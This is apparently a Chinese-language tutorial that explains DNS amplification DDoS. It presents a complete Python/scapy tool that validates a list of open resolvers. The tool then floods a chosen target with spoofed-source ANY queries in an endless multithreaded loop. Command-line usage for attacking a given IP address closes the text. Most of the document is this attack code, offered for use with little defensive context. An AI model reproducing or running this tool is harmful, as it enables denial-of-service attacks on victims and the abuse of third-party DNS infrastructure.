查询放大攻击的原理是,通过网络中存在的DNS服务器资源,对目标主机发起的拒绝服务攻击,其原理是伪造源地址为被攻击目标的地址,向DNS递归服务器发起查询请求,此时由于源IP是伪造的,固在DNS服务器回包的时候,会默认回给伪造的IP地址,从而使DNS服务成为了流量放大和攻击的实施者,通过查询大量的DNS服务器,从而实现反弹大量的查询流量,导致目标主机查询带宽被塞满,实现DDOS的目的。
此时我们使用scapy工具构建一个DNS请求数据包 sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="qq.com")),timeout=2) 查询指定网站的DNS记录,结果如下。
上图可以看出,我们所发送的数据长度要小于接收到的数据长度,流量差不多被放大了3倍左右,我们只需要将源地址伪造为被害机器,并使用海量的DNS服务器作为僵尸主机发包,即可完成DDOS攻击。
这里需要在网上找一些DNS服务器。
import socket,os,sys
from scapy.all import *
def Inspect_DNS_Usability(filename):
proxy_list = []
fp = open(filename,"r")
for i in fp.readlines():
try:
addr = i.replace("\n","")
respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
if respon != "":
proxy_list.append(str(respon["IP"].src))
except Exception:
pass
return proxy_list
proxy = Inspect_DNS_Usability("./dnslist.log")
fp = open("pass.log","w+")
for item in proxy:
fp.write(item + "\n")
fp.close()验证好有效性以后,接着就是Python多线程发包测试了,scapy构建数据包时由于DNS数据包比较特殊,构建是应该按照顺序 IP/UDP/DNS来构建,以下代码可以完成发包测试
import socket,os,sys
from scapy.all import *
# 构造IP数据包
ip_pack = IP()
ip_pack.src = "192.168.1.2"
ip_pack.dst = "8.8.8.8"
# 构造UDP数据包
udp_pack = UDP()
udp_pack.sport = 53
udp_pack.dport = 53
# 构建DNS数据包
dns_pack = DNS()
dns_pack.rd = 1
dns_pack.qdcount = 1
# 构建DNSQR解析
dnsqr_pack = DNSQR()
dnsqr_pack.qname = "baidu.com"
dnsqr_pack.qtype = 255
dns_pack.qd = dnsqr_pack
respon = (ip_pack/udp_pack/dns_pack)
sr1(respon)最终的完整代码如下所示,通过大量的DNS查询请求实现针对目标主机的拒绝服务.
import os,sys,threading,time
from scapy.all import *
import argparse
def Inspect_DNS_Usability(filename):
proxy_list = []
fp = open(filename,"r")
for i in fp.readlines():
try:
addr = i.replace("\n","")
respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
if respon != "":
proxy_list.append(str(respon["IP"].src))
except Exception:
pass
return proxy_list
def DNS_Flood(target,dns):
# 构造IP数据包
ip_pack = IP()
ip_pack.src = target
ip_pack.dst = dns
# ip_pack.src = "192.168.1.2"
# ip_pack.dst = "8.8.8.8"
# 构造UDP数据包
udp_pack = UDP()
udp_pack.sport = 53
udp_pack.dport = 53
# 构造DNS数据包
dns_pack = DNS()
dns_pack.rd = 1
dns_pack.qdcount = 1
# 构造DNSQR解析
dnsqr_pack = DNSQR()
dnsqr_pack.qname = "baidu.com"
dnsqr_pack.qtype = 255
dns_pack.qd = dnsqr_pack
respon = (ip_pack/udp_pack/dns_pack)
sr1(respon)
def Banner():
print(" _ ____ _ _ ")
print(" | | _ _/ ___|| |__ __ _ _ __| | __")
print(" | | | | | \___ \| '_ \ / _` | '__| |/ /")
print(" | |__| |_| |___) | | | | (_| | | | < ")
print(" |_____\__, |____/|_| |_|\__,_|_| |_|\_\\")
print(" |___/ \n")
print("E-Mail: me@lyshark.com\n")
if __name__ == "__main__":
Banner()
parser = argparse.ArgumentParser()
parser.add_argument("--mode",dest="mode",help="选择执行命令<check=检查DNS可用性/flood=攻击>")
parser.add_argument("-f","--file",dest="file",help="指定一个DNS字典,里面存储DNSIP地址")
parser.add_argument("-t",dest="target",help="输入需要攻击的IP地址")
args = parser.parse_args()
if args.mode == "check" and args.file:
proxy = Inspect_DNS_Usability(args.file)
fp = open("pass.log","w+")
for item in proxy:
fp.write(item + "\n")
fp.close()
print("[+] DNS地址检查完毕,当前可用DNS保存为 pass.log")
elif args.mode == "flood" and args.target and args.file:
with open(args.file,"r") as fp:
countent = [line.rstrip("\n") for line in fp]
while True:
randomDNS = str(random.sample(countent,1)[0])
print("[+] 目标主机: {} -----> 随机DNS: {}".format(args.target,randomDNS))
t = threading.Thread(target=DNS_Flood,args=(args.target,randomDNS,))
t.start()
else:
parser.print_help()使用方式首先准备一个test.log里面一行一个存放所有的已知DNS列表,并通过check命令验证该DNS是否可用,并将可用的DNS保存为pass.log
- main.py --mode=check -f dns.txt
当需要发起攻击时,只需要指定pass.log 文件,则自动使用该DNS列表进行批量查询。
- main.py --mode=flood -f pass.log -t 192.168.1.1
